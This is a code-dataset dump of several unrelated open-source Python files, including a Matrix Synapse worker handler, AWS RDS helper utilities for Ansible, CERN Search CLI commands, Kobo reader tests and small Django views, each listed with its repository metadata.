2022-03-31T23:22:42.000Z
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 9,320
|
2015-01-08T14:09:03.000Z
|
2022-03-31T21:11:24.000Z
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 2,299
|
2015-01-31T22:16:29.000Z
|
2022-03-31T06:08:26.000Z
|
# Copyright 2018-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from synapse.api.errors import SynapseError
from synapse.handlers.room_member import RoomMemberHandler
from synapse.replication.http.membership import (
ReplicationRemoteJoinRestServlet as ReplRemoteJoin,
ReplicationRemoteKnockRestServlet as ReplRemoteKnock,
ReplicationRemoteRejectInviteRestServlet as ReplRejectInvite,
ReplicationRemoteRescindKnockRestServlet as ReplRescindKnock,
ReplicationUserJoinedLeftRoomRestServlet as ReplJoinedLeft,
)
from synapse.types import JsonDict, Requester, UserID
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class RoomMemberWorkerHandler(RoomMemberHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self._remote_join_client = ReplRemoteJoin.make_client(hs)
self._remote_knock_client = ReplRemoteKnock.make_client(hs)
self._remote_reject_client = ReplRejectInvite.make_client(hs)
self._remote_rescind_client = ReplRescindKnock.make_client(hs)
self._notify_change_client = ReplJoinedLeft.make_client(hs)
async def _remote_join(
self,
requester: Requester,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Implements RoomMemberHandler._remote_join"""
if len(remote_room_hosts) == 0:
raise SynapseError(404, "No known servers")
ret = await self._remote_join_client(
requester=requester,
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user_id=user.to_string(),
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_reject_invite(
self,
invite_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: dict,
) -> Tuple[str, int]:
"""
Rejects an out-of-band invite received from a remote user
Implements RoomMemberHandler.remote_reject_invite
"""
ret = await self._remote_reject_client(
invite_event_id=invite_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_rescind_knock(
self,
knock_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: JsonDict,
) -> Tuple[str, int]:
"""
Rescinds a local knock made on a remote room
Args:
knock_event_id: the knock event
txn_id: optional transaction ID supplied by the client
requester: user making the request, according to the access token
content: additional content to include in the leave event.
Normally an empty dict.
Returns:
A tuple containing (event_id, stream_id of the leave event)
"""
ret = await self._remote_rescind_client(
knock_event_id=knock_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_knock(
self,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Sends a knock to a room.
Implements RoomMemberHandler.remote_knock
"""
ret = await self._remote_knock_client(
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user=user,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def _user_left_room(self, target: UserID, room_id: str) -> None:
"""Implements RoomMemberHandler._user_left_room"""
await self._notify_change_client(
user_id=target.to_string(), room_id=room_id, change="left"
)
async def forget(self, target: UserID, room_id: str) -> None:
raise RuntimeError("Cannot forget rooms on workers.")
| 33.746479
| 77
| 0.660267
| 3,497
| 0.729758
| 0
| 0
| 0
| 0
| 2,997
| 0.625417
| 1,540
| 0.321369
|
22159f4a1c6d6e72ce319e5cebbbcc4d51c13acd
| 2,205
|
py
|
Python
|
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 10
|
2018-03-30T16:09:02.000Z
|
2021-12-07T07:29:19.000Z
|
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | null | null | null |
win/devkit/other/pymel/extras/completion/py/maya/app/edl/importExport.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 9
|
2018-06-02T09:18:49.000Z
|
2021-12-20T09:24:35.000Z
|
import tempfile
import maya.OpenMaya as OpenMaya
import maya.OpenMayaRender as OpenMayaRender
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as cmds
import maya
import re
from maya.app.edl.fcp import *
class ImportExport(OpenMayaMPx.MPxCommand):
def __del__(self):
pass
def __init__(self):
pass
class Exporter(ImportExport):
def __init__(self):
pass
def doIt(self, fileName):
pass
def setAllowPlayblast(self, allow):
"""
If true, will re-playblast of all shots whose clips are out of date
or non-existent.
"""
pass
class Importer(ImportExport):
def __init__(self):
pass
def doIt(self, fileName):
"""
Reads an EDL file into Maya. Will generate shots, tracks and audio in Maya that
corresponds to the tracks and clips in the EDL.
"""
pass
def setStartFrameOverride(self, frame):
pass
def _setTimeCode(timecode):
pass
def doExport(fileName, allowPlayblast):
"""
Exports the Maya sequence using the EDL Exporter class.
"""
pass
def doMel(*args, **kwargs):
"""
Takes as input a string containing MEL code, evaluates it, and returns the result.
This function takes a string which contains MEL code and evaluates it using
the MEL interpreter. The result is converted into a Python data type and is
returned.
If an error occurs during the execution of the MEL script, a Python exception
is raised with the appropriate error message.
"""
pass
def audioClipCompare(a, b):
pass
def _getValidClipObjectName(clipName, isVideo):
pass
def doImport(fileName, useStartFrameOverride, startFrame):
"""
Imports the specified file using the EDL Importer class.
"""
pass
def _nameToNode(name):
pass
def getTimeCode():
pass
def videoClipCompare(a, b):
pass
def getShotsResolution():
"""
Returns the video resolution of the sequencer if all the shots have the same resolution
Otherwise it returns False, 0, 0
"""
pass
mayaFrameRates = {}
| 17.64
| 92
| 0.647166
| 798
| 0.361905
| 0
| 0
| 0
| 0
| 0
| 0
| 976
| 0.44263
|
22189dbba6fcdc9b59fa2a428105a701aaaf4a2f
| 1,040
|
py
|
Python
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 5
|
2017-01-16T03:59:47.000Z
|
2020-06-23T02:54:19.000Z
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 293
|
2015-10-29T17:45:52.000Z
|
2022-01-07T16:31:09.000Z
|
packages/mcni/python/mcni/instrument_simulator/__init__.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 1
|
2019-05-25T00:53:31.000Z
|
2019-05-25T00:53:31.000Z
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 2006-2010 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
## Note:
## 1. This package depends on dsm
def copyright():
return "mcni.instrument_simulators module: Copyright (c) 2006-2010 Jiao Lin";
def simulator(neutron_coordinates_transformer):
t = neutron_coordinates_transformer
from .AbstractInstrumentSimulator import AbstractInstrumentSimulator as base
class Simulator(base):
neutron_coordinates_transformer = t
pass
return Simulator()
from mcni.neutron_coordinates_transformers import default as default_neutron_coordinates_transformer
default_simulator = simulator( default_neutron_coordinates_transformer )
# version
__id__ = "$Id$"
# End of file
| 26.666667
| 100
| 0.575
| 79
| 0.075962
| 0
| 0
| 0
| 0
| 0
| 0
| 524
| 0.503846
|
22199caafbe2cf83aa5b2f765370eb9a8ab49f37
| 169
|
py
|
Python
|
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
todolist/wsgi.py
|
HangeZoe/django-todo-list
|
8a3232916e57724d52f0f93124f346d82b72e0ce
|
[
"MIT"
] | null | null | null |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'todolist.settings')
application = get_wsgi_application()
| 21.125
| 68
| 0.828402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 43
| 0.254438
|
221aaf010e11acc9785595a6c6873f1ea746ad9a
| 4,501
|
py
|
Python
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/citadel-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 6
|
2020-04-12T18:30:08.000Z
|
2021-09-15T05:53:40.000Z
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/cern-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 6
|
2020-03-19T13:28:38.000Z
|
2020-12-08T16:54:05.000Z
|
cern_search_rest_api/modules/cernsearch/cli.py
|
inveniosoftware-contrib/cern-search
|
736fdb3a5b32f750111bc846bc815c4671978fa1
|
[
"MIT"
] | 2
|
2019-04-22T21:20:17.000Z
|
2019-05-16T08:50:38.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of CERN Search.
# Copyright (C) 2018-2021 CERN.
#
# Citadel Search is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Click command-line utilities."""
import json
import click
from flask.cli import with_appcontext
from invenio_pidstore.models import PersistentIdentifier, PIDStatus
from invenio_records.models import RecordMetadata
from invenio_search import current_search
from invenio_search.cli import es_version_check
from cern_search_rest_api.modules.cernsearch.indexer import CernSearchRecordIndexer
from cern_search_rest_api.modules.cernsearch.indexer_tasks import process_bulk_queue
def abort_if_false(ctx, param, value):
"""Abort command is value is False."""
if not value:
ctx.abort()
@click.group()
def utils():
"""Misc management commands."""
@utils.command("runindex")
@click.option("--delayed", "-d", is_flag=True, help="Run indexing in background.")
@click.option(
"--chunk_size",
"-s",
default=500,
type=int,
help="Number of docs in one chunk sent to es (default: 500)",
)
@click.option(
"--max_chunk_bytes",
"-b",
default=int(99.9 * 1024 * 1024),
type=int,
help="The maximum size of the request in bytes (default: 100MB).",
)
@click.option(
"--concurrency",
"-c",
default=1,
type=int,
help="Number of concurrent indexing tasks to start.",
)
@click.option(
"--queue",
"-q",
type=str,
help="Name of the celery queue used to put the tasks into.",
)
@click.option("--version-type", help="Elasticsearch version type to use.")
@click.option(
"--raise-on-error/--skip-errors",
default=True,
help="Controls if Elasticsearch bulk indexing errors raise an exception.",
)
@with_appcontext
def run(
delayed,
chunk_size,
max_chunk_bytes,
concurrency,
queue=None,
version_type=None,
raise_on_error=True,
):
"""Run bulk record indexing."""
es_bulk_kwargs = {
"raise_on_error": raise_on_error,
"chunk_size": chunk_size,
"max_chunk_bytes": max_chunk_bytes,
}
if delayed:
celery_kwargs = {"kwargs": {"version_type": version_type, "es_bulk_kwargs": es_bulk_kwargs}}
click.secho("Starting {0} tasks for indexing records...".format(concurrency), fg="green")
if queue is not None:
celery_kwargs.update({"queue": queue})
for c in range(0, concurrency):
process_bulk_queue.apply_async(**celery_kwargs)
else:
click.secho("Indexing records...", fg="green")
CernSearchRecordIndexer(version_type=version_type).process_bulk_queue(es_bulk_kwargs=es_bulk_kwargs)
@utils.command("reindex")
@click.option(
"--yes-i-know",
is_flag=True,
callback=abort_if_false,
expose_value=False,
prompt="Do you really want to reindex all records?",
)
@click.option("-t", "--pid-type", multiple=True, required=True)
@click.option("-i", "--id", "id_list", help="List of ids.", multiple=True)
@click.option("-d", "--doc-type", required=False)
@with_appcontext
def reindex(pid_type, id_list, doc_type=None):
"""Reindex all records.
:param pid_type: Pid type.
:param id_list: List of ids.
:param doc_type: Doc type
"""
click.secho("Sending records to indexing queue ...", fg="green")
query = id_list
if not query:
query = (
PersistentIdentifier.query.filter_by(object_type="rec", status=PIDStatus.REGISTERED)
.join(RecordMetadata, PersistentIdentifier.object_uuid == RecordMetadata.id)
.filter(PersistentIdentifier.pid_type.in_(pid_type))
)
if doc_type:
query = query.filter(RecordMetadata.json.op("->>")("$schema").contains(doc_type))
query = (x[0] for x in query.yield_per(100).values(PersistentIdentifier.object_uuid))
CernSearchRecordIndexer().bulk_index(query)
click.secho('Execute "run" command to process the queue!', fg="yellow")
@utils.command("index-init")
@click.argument("index_name")
@click.option("-f", "--force", is_flag=True, default=False)
@click.option("-v", "--verbose", is_flag=True, default=False)
@with_appcontext
@es_version_check
def index_init(index_name, force, verbose):
"""Init index by its name."""
results = list(current_search.create(index_list=[index_name], ignore_existing=force))
if verbose:
click.echo(json.dumps(results))
| 30.412162
| 108
| 0.682959
| 0
| 0
| 0
| 0
| 3,626
| 0.805599
| 0
| 0
| 1,511
| 0.335703
|
221ac1f2a8c5526fcda12d6ed18346f9e5d9d58a
| 906
|
py
|
Python
|
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | 1
|
2015-06-26T18:05:20.000Z
|
2015-06-26T18:05:20.000Z
|
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | null | null | null |
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | null | null | null |
__author__ = 'wektor'
from generic import GenericBackend
import redis
class RedisBackend(GenericBackend):
def __init__(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
self.store = redis.Redis(connection_pool=pool)
def get_typecode(self, value):
typecode = str(type(value)).split("'")[1]
return typecode
def set(self, key, value):
data = {}
data["type"] = self.get_typecode(value)
data["data"] = value
self.store.hmset(key, data)
# def update(self, key, value):
def get(self, key):
data = self.store.hgetall(key)
print data
try:
if data["type"] != "str":
return eval(data["data"])
else:
return data["data"]
except KeyError:
return {}
def delete(self, key):
self.store.delete(key)
| 25.166667
| 71
| 0.562914
| 833
| 0.919426
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.09713
|
221b92eff3eb5754a23903956aeef1d20d52980f
| 11,288
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 22
|
2021-07-16T08:11:22.000Z
|
2022-03-31T07:15:34.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 39
|
2021-07-05T02:31:42.000Z
|
2022-03-31T02:46:03.000Z
|
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from collections import namedtuple
from time import sleep
try:
from botocore.exceptions import BotoCoreError, ClientError, WaiterError
except ImportError:
pass
from ansible.module_utils._text import to_text
from ansible.module_utils.common.dict_transformations import snake_dict_to_camel_dict
from .ec2 import AWSRetry
from .ec2 import ansible_dict_to_boto3_tag_list
from .ec2 import boto3_tag_list_to_ansible_dict
from .ec2 import compare_aws_tags
from .waiters import get_waiter
Boto3ClientMethod = namedtuple('Boto3ClientMethod', ['name', 'waiter', 'operation_description', 'cluster', 'instance'])
# Whitelist boto3 client methods for cluster and instance resources
cluster_method_names = [
'create_db_cluster', 'restore_db_cluster_from_db_snapshot', 'restore_db_cluster_from_s3',
'restore_db_cluster_to_point_in_time', 'modify_db_cluster', 'delete_db_cluster', 'add_tags_to_resource',
'remove_tags_from_resource', 'list_tags_for_resource', 'promote_read_replica_db_cluster'
]
instance_method_names = [
'create_db_instance', 'restore_db_instance_to_point_in_time', 'restore_db_instance_from_s3',
'restore_db_instance_from_db_snapshot', 'create_db_instance_read_replica', 'modify_db_instance',
'delete_db_instance', 'add_tags_to_resource', 'remove_tags_from_resource', 'list_tags_for_resource',
'promote_read_replica', 'stop_db_instance', 'start_db_instance', 'reboot_db_instance'
]
def get_rds_method_attribute(method_name, module):
readable_op = method_name.replace('_', ' ').replace('db', 'DB')
if method_name in cluster_method_names and 'new_db_cluster_identifier' in module.params:
cluster = True
instance = False
if method_name == 'delete_db_cluster':
waiter = 'cluster_deleted'
else:
waiter = 'cluster_available'
elif method_name in instance_method_names and 'new_db_instance_identifier' in module.params:
cluster = False
instance = True
if method_name == 'delete_db_instance':
waiter = 'db_instance_deleted'
elif method_name == 'stop_db_instance':
waiter = 'db_instance_stopped'
else:
waiter = 'db_instance_available'
else:
raise NotImplementedError("method {0} hasn't been added to the list of accepted methods to use a waiter in module_utils/rds.py".format(method_name))
return Boto3ClientMethod(name=method_name, waiter=waiter, operation_description=readable_op, cluster=cluster, instance=instance)
def get_final_identifier(method_name, module):
apply_immediately = module.params['apply_immediately']
if get_rds_method_attribute(method_name, module).cluster:
identifier = module.params['db_cluster_identifier']
updated_identifier = module.params['new_db_cluster_identifier']
elif get_rds_method_attribute(method_name, module).instance:
identifier = module.params['db_instance_identifier']
updated_identifier = module.params['new_db_instance_identifier']
else:
raise NotImplementedError("method {0} hasn't been added to the list of accepted methods in module_utils/rds.py".format(method_name))
if not module.check_mode and updated_identifier and apply_immediately:
identifier = updated_identifier
return identifier
def handle_errors(module, exception, method_name, parameters):
if not isinstance(exception, ClientError):
module.fail_json_aws(exception, msg="Unexpected failure for method {0} with parameters {1}".format(method_name, parameters))
changed = True
error_code = exception.response['Error']['Code']
if method_name == 'modify_db_instance' and error_code == 'InvalidParameterCombination':
if 'No modifications were requested' in to_text(exception):
changed = False
elif 'ModifyDbCluster API' in to_text(exception):
module.fail_json_aws(exception, msg='It appears you are trying to modify attributes that are managed at the cluster level. Please see rds_cluster')
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
elif method_name == 'promote_read_replica' and error_code == 'InvalidDBInstanceState':
if 'DB Instance is not a read replica' in to_text(exception):
changed = False
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
elif method_name == 'create_db_instance' and exception.response['Error']['Code'] == 'InvalidParameterValue':
accepted_engines = [
'aurora', 'aurora-mysql', 'aurora-postgresql', 'mariadb', 'mysql', 'oracle-ee', 'oracle-se',
'oracle-se1', 'oracle-se2', 'postgres', 'sqlserver-ee', 'sqlserver-ex', 'sqlserver-se', 'sqlserver-web'
]
if parameters.get('Engine') not in accepted_engines:
module.fail_json_aws(exception, msg='DB engine {0} should be one of {1}'.format(parameters.get('Engine'), accepted_engines))
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
return changed
def call_method(client, module, method_name, parameters):
result = {}
changed = True
if not module.check_mode:
wait = module.params['wait']
# TODO: stabilize by adding get_rds_method_attribute(method_name).extra_retry_codes
method = getattr(client, method_name)
try:
if method_name == 'modify_db_instance':
# check if instance is in an available state first, if possible
if wait:
wait_for_status(client, module, module.params['db_instance_identifier'], method_name)
result = AWSRetry.jittered_backoff(catch_extra_error_codes=['InvalidDBInstanceState'])(method)(**parameters)
else:
result = AWSRetry.jittered_backoff()(method)(**parameters)
except (BotoCoreError, ClientError) as e:
changed = handle_errors(module, e, method_name, parameters)
if wait and changed:
identifier = get_final_identifier(method_name, module)
wait_for_status(client, module, identifier, method_name)
return result, changed
def wait_for_instance_status(client, module, db_instance_id, waiter_name):
def wait(client, db_instance_id, waiter_name, extra_retry_codes):
retry = AWSRetry.jittered_backoff(catch_extra_error_codes=extra_retry_codes)
try:
waiter = client.get_waiter(waiter_name)
except ValueError:
# using a waiter in module_utils/waiters.py
waiter = get_waiter(client, waiter_name)
waiter.wait(WaiterConfig={'Delay': 60, 'MaxAttempts': 60}, DBInstanceIdentifier=db_instance_id)
waiter_expected_status = {
'db_instance_deleted': 'deleted',
'db_instance_stopped': 'stopped',
}
expected_status = waiter_expected_status.get(waiter_name, 'available')
if expected_status == 'available':
extra_retry_codes = ['DBInstanceNotFound']
else:
extra_retry_codes = []
for attempt_to_wait in range(0, 10):
try:
wait(client, db_instance_id, waiter_name, extra_retry_codes)
break
except WaiterError as e:
# Instance may be renamed and AWSRetry doesn't handle WaiterError
if e.last_response.get('Error', {}).get('Code') == 'DBInstanceNotFound':
sleep(10)
continue
module.fail_json_aws(e, msg='Error while waiting for DB instance {0} to be {1}'.format(db_instance_id, expected_status))
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg='Unexpected error while waiting for DB instance {0} to be {1}'.format(
db_instance_id, expected_status)
)
def wait_for_cluster_status(client, module, db_cluster_id, waiter_name):
try:
waiter = get_waiter(client, waiter_name).wait(DBClusterIdentifier=db_cluster_id)
except WaiterError as e:
if waiter_name == 'cluster_deleted':
msg = "Failed to wait for DB cluster {0} to be deleted".format(db_cluster_id)
else:
msg = "Failed to wait for DB cluster {0} to be available".format(db_cluster_id)
module.fail_json_aws(e, msg=msg)
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg="Failed with an unexpected error while waiting for the DB cluster {0}".format(db_cluster_id))
def wait_for_status(client, module, identifier, method_name):
waiter_name = get_rds_method_attribute(method_name, module).waiter
if get_rds_method_attribute(method_name, module).cluster:
wait_for_cluster_status(client, module, identifier, waiter_name)
elif get_rds_method_attribute(method_name, module).instance:
wait_for_instance_status(client, module, identifier, waiter_name)
else:
raise NotImplementedError("method {0} hasn't been added to the whitelist of handled methods".format(method_name))
def get_tags(client, module, cluster_arn):
try:
return boto3_tag_list_to_ansible_dict(
client.list_tags_for_resource(ResourceName=cluster_arn)['TagList']
)
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg="Unable to describe tags")
def arg_spec_to_rds_params(options_dict):
tags = options_dict.pop('tags')
has_processor_features = False
if 'processor_features' in options_dict:
has_processor_features = True
processor_features = options_dict.pop('processor_features')
camel_options = snake_dict_to_camel_dict(options_dict, capitalize_first=True)
for key in list(camel_options.keys()):
for old, new in (('Db', 'DB'), ('Iam', 'IAM'), ('Az', 'AZ')):
if old in key:
camel_options[key.replace(old, new)] = camel_options.pop(key)
camel_options['Tags'] = tags
if has_processor_features:
camel_options['ProcessorFeatures'] = processor_features
return camel_options
def ensure_tags(client, module, resource_arn, existing_tags, tags, purge_tags):
if tags is None:
return False
tags_to_add, tags_to_remove = compare_aws_tags(existing_tags, tags, purge_tags)
changed = bool(tags_to_add or tags_to_remove)
if tags_to_add:
call_method(
client, module, method_name='add_tags_to_resource',
parameters={'ResourceName': resource_arn, 'Tags': ansible_dict_to_boto3_tag_list(tags_to_add)}
)
if tags_to_remove:
call_method(
client, module, method_name='remove_tags_from_resource',
parameters={'ResourceName': resource_arn, 'TagKeys': tags_to_remove}
)
return changed
| 47.830508
| 159
| 0.710578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,193
| 0.282867
|
221baabdac2f34fa39aafcaa192dcd1f1b264104
| 176
|
py
|
Python
|
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
# Uppercases string one character at a time
from cs50 import get_string
s = get_string("Before: ")
print("After: ", end="")
for c in s:
print(c.upper(), end="")
print()
| 17.6
| 43
| 0.653409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 67
| 0.380682
|
221c5dbcccafcacd09ca66b22dfdff675d20b942
| 2,050
|
py
|
Python
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 75
|
2019-08-24T14:21:53.000Z
|
2022-02-21T17:20:20.000Z
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 9
|
2019-10-15T19:30:16.000Z
|
2021-08-17T15:24:00.000Z
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 4
|
2020-02-05T13:53:59.000Z
|
2021-08-17T14:50:39.000Z
|
from datetime import datetime
from pathlib import Path
import pytz
import kobuddy
def get_test_db():
# db = Path(__file__).absolute().parent.parent / 'KoboShelfes' / 'KoboReader.sqlite.0'
db = Path(__file__).absolute().parent / 'data' / 'kobo_notes' / 'input' / 'KoboReader.sqlite'
return db
# a bit meh, but ok for now
kobuddy.set_databases(get_test_db())
from kobuddy import _iter_events_aux, get_events, get_books_with_highlights, _iter_highlights
def test_events():
for e in _iter_events_aux():
print(e)
def test_hls():
for h in _iter_highlights():
print(h)
def test_get_all():
events = get_events()
assert len(events) > 50
for d in events:
print(d)
def test_books_with_highlights():
pages = get_books_with_highlights()
g = pages[0]
assert 'Essentialism' in g.book
hls = g.highlights
assert len(hls) == 273
[b] = [h for h in hls if h.eid == '520b7b13-dbef-4402-9a81-0f4e0c4978de']
# TODO wonder if there might be any useful info? StartContainerPath, EndContainerPath
assert b.kind == 'bookmark'
# TODO move to a more specific test?
# TODO assert sorted by date or smth?
assert hls[0].kind == 'highlight'
# TODO assert highlights got no annotation? not sure if it's even necessary to distinguish..
[ann] = [h for h in hls if h.annotation is not None and len(h.annotation) > 0]
assert ann.eid == 'eb264817-9a06-42fd-92ff-7bd38cd9ca79'
assert ann.kind == 'annotation'
assert ann.text == 'He does this by finding which machine has the biggest queue of materials waiting behind it and finds a way to increase its efficiency.'
assert ann.annotation == 'Bottleneck'
assert ann.dt == datetime(year=2017, month=8, day=12, hour=3, minute=49, second=13, microsecond=0, tzinfo=pytz.utc)
assert ann.book.author == 'Greg McKeown'
assert len(pages) == 7
def test_history():
kobuddy.print_progress()
def test_annotations():
kobuddy.print_annotations()
def test_books():
kobuddy.print_books()
| 28.472222
| 159
| 0.691707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 692
| 0.337561
|
221edc811e6d0e0ea5e013272ed5a112078a3713
| 1,062
|
py
|
Python
|
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.shortcuts import render
from .models import Tank
from django.db import models
from django.http import HttpResponse
from django.views import View
# Create your views here.
# The view for the created model Tank
def tank_view(request):
queryset = Tank.objects.all()
context = {
'object': queryset
}
return render(request, "tankbattle.html", context)
def tank_1(request, pk):
queryset = Tank.objects.get(pk=1)
context = {
'object': queryset
}
return render(request, 'tankbattle.html', context)
def tank_2(request, pk):
queryset = Tank.objects.get(pk=2)
context = {
'object': queryset
}
return render(request, 'tankbattle.html', context)
def tank_3(request, pk):
queryset = Tank.objects.get(pk=3)
context = {
'object': queryset
}
return render(request, 'tankbattle.html', context)
def tank_4(request, pk):
queryset = Tank.objects.get(pk=4)
context = {
'object': queryset
}
return render(request, 'tankbattle.html', context)
| 21.673469
| 54
| 0.65725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.176083
|